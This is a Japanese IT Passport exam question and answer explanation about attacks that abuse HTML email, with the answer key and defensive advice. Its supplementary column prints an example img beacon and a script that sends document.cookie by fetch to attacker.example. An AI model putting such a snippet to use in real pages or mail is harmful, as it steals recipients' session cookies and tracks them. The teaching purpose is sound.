ITパスポート 2020年 秋期 問56
問題文
HTML形式の電子メールの特徴を悪用する攻撃はどれか。
選択肢
ア:DoS攻撃
イ:SQLインジェクション
ウ:悪意のあるスクリプトの実行(正解)
エ:辞書攻撃
🔒 解説は解答すると表示されます
HTML形式の電子メールの特徴を悪用する攻撃はどれか。【ITパスポート 解説】
正解の理由
HTML形式の電子メールは、Webページと同じように画像やリンク、フォーム、そして場合によってはスクリプト(プログラム)を含められます。スクリプトはブラウザなどで実行される小さなプログラムです。こうした「HTMLの機能」を悪用して受信者の環境で意図しないコードを実行させる攻撃があり、選択肢の中では ウ(悪意のあるスクリプトの実行)が当てはまります。
具体的には、HTMLメール中の悪意ある JavaScript(ジャバスクリプト:Webページで動くスクリプト言語)や外部参照により、情報を盗んだり不正サイトに誘導したりすることが可能です。したがって HTML の機能を悪用する攻撃として最も直接的なのは ウ です。
解法ステップ
- 問題文を読み、対象が「HTML形式の電子メールの特徴」であることを確認する。
- HTML形式メール = HTML(HyperText Markup Language:文書構造を表す言語)で書けるメール。画像やリンク、フォーム、時にスクリプトを含められる。
- 各選択肢が「HTMLメールの機能を直接悪用するか」を検討する。
- スクリプトが実行できること = 悪意のあるスクリプトの実行と直結する。
- 他の選択肢(DoS、SQLインジェクション、辞書攻撃)が HTMLメール固有の特徴を利用する攻撃かを判断する。
- それらは別の手法や対象(サーバ、データベース、パスワード)に関連するため不適切と判断する。
- 結論として、HTMLの「スクリプト実行」や「外部コンテンツ読み込み」を悪用する ウ を正答とする。
選択肢別の誤答解説
-
ア: DoS攻撃(Denial of Service:サービス妨害攻撃)
- 意味:対象サーバやサービスに大量の要求を送り、正当な利用を妨げる攻撃。
- なぜ違うか:DoSは大量トラフィックや資源枯渇を狙う手法であり、HTMLメールの「見た目やスクリプト機能」を悪用する説明には該当しません。HTMLメール自体が直接 DoS を引き起こすことは一般的ではありません。
-
イ: SQLインジェクション(SQL injection)
- 意味:SQL(Structured Query Language:データベースを操作する言語)を不正に組み込んで、データベースから情報を盗んだり改ざんしたりする攻撃。
- なぜ違うか:SQLインジェクションは主に Web アプリケーションの入力処理の脆弱性を狙う手法です。HTMLメールがそのまま SQL を実行するわけではなく、HTMLメールの特徴を悪用する攻撃とは直結しません(ただし、メール内リンク経由で脆弱なサイトに誘導すれば結果的に SQLi 被害につながる可能性はあるが、本問の直接的な答えではない)。
-
ウ: 悪意のあるスクリプトの実行
- 意味:メール本文に埋め込まれたスクリプトが実行され、情報窃取や不正操作を行う攻撃(例:クロスサイトスクリプティング=XSSに似たもの)。
- なぜ正しいか:HTMLメールはスクリプトや外部コンテンツ読み込みという機能を含めるため、そこを直接悪用してスクリプトを実行する攻撃が成立します。
-
エ: 辞書攻撃
- 意味:パスワード推測で、よく使われる単語リスト(辞書)を試す攻撃。
- なぜ違うか:辞書攻撃は認証情報(パスワード)に対する攻撃手法であり、HTMLメールの「表示やスクリプト機能」を悪用するという文脈には合いません。
よくある誤解
- 「HTMLメールは必ずスクリプトが実行される」
- 実際には多くのメールクライアントはセキュリティのために JavaScript 等の実行を無効化しています。しかし、メールを表示する環境(例えば Web メールをブラウザで開く、あるいは脆弱なビューア)が危険になることはあります。
- 「HTMLメール=ただの見た目装飾だけで危険ではない」
- 見た目だけでなく、外部画像読み込み(画像ビーコン)で開封情報を受信者の知らないうちに送信したり、リンク経由でフィッシングサイトに誘導したりする危険性があります。
補足コラム
- メールでよく使われる攻撃手法と対策(簡潔)
- 画像ビーコン:HTMLメール中の小さな外部画像を読み込むことで「メールを開封した」情報を送信する手法。対策:画像の自動読み込みを無効にする。
- 悪意あるリンク:見た目は正規サイトでも実際は偽サイトへ誘導する。対策:リンク先を長押し/マウスオーバーで URL を確認する、怪しいメールはクリックしない。
- スクリプト実行:メール中のスクリプトで情報を盗む。対策:メールクライアントのセキュリティ設定を利用してスクリプトをブロックし、HTMLメールを無効にするかプレーンテキスト表示にする。
- 簡単な例(教育目的)
- HTMLメールの一部に次のようなコードがあれば、悪用されるおそれがあります。
<img src="http://attacker.example/track?id=12345" alt=""> <script> // 実際の環境では多くのメールクライアントで無効化されるが、 // 仮に実行されれば危険な処理が走る可能性がある fetch('http://attacker.example/steal?cookie=' + document.cookie); </script> - 上の例では画像読み込みで開封通知、スクリプトはもし実行されればクッキーなどを送信してしまう恐れがあります。
- HTMLメールの一部に次のようなコードがあれば、悪用されるおそれがあります。
FAQ
Q1: HTMLメールで JavaScript は本当に実行されるのですか?
A1: 多くのメールクライアント(受信ソフト)はセキュリティのため JavaScript を実行しないか制限します。しかし、Webメールをブラウザで開く場合や脆弱なビューワを使うと危険です。完全ではないので注意が必要です。
A1: 多くのメールクライアント(受信ソフト)はセキュリティのため JavaScript を実行しないか制限します。しかし、Webメールをブラウザで開く場合や脆弱なビューワを使うと危険です。完全ではないので注意が必要です。
Q2: プレーンテキストメールにすれば安全ですか?
A2: プレーンテキスト(純粋な文字だけのメール)にすれば、HTML の機能(画像・フォーム・スクリプト)は含まれないためリスクは少なくなります。ただし、リンクを手入力で誘導されるなど別の攻撃手法もあり得ます。
A2: プレーンテキスト(純粋な文字だけのメール)にすれば、HTML の機能(画像・フォーム・スクリプト)は含まれないためリスクは少なくなります。ただし、リンクを手入力で誘導されるなど別の攻撃手法もあり得ます。
Q3: 受信者として日常でできる対策は何ですか?
A3: 画像の自動表示をオフ、疑わしいメールのリンクや添付ファイルを開かない、メールクライアントやOSを最新に保つ、二段階認証を有効にする、などが有効です。
A3: 画像の自動表示をオフ、疑わしいメールのリンクや添付ファイルを開かない、メールクライアントやOSを最新に保つ、二段階認証を有効にする、などが有効です。
関連キーワード: HTMLメール、JavaScript、XSS(クロスサイトスクリプティング)、画像ビーコン、フィッシング、メールセキュリティ、MIME、SMTP

\ せっかくなら /
ITパスポートを
クイズ形式で学習しませんか?
クイズ画面へ遷移する→
すぐに利用可能!

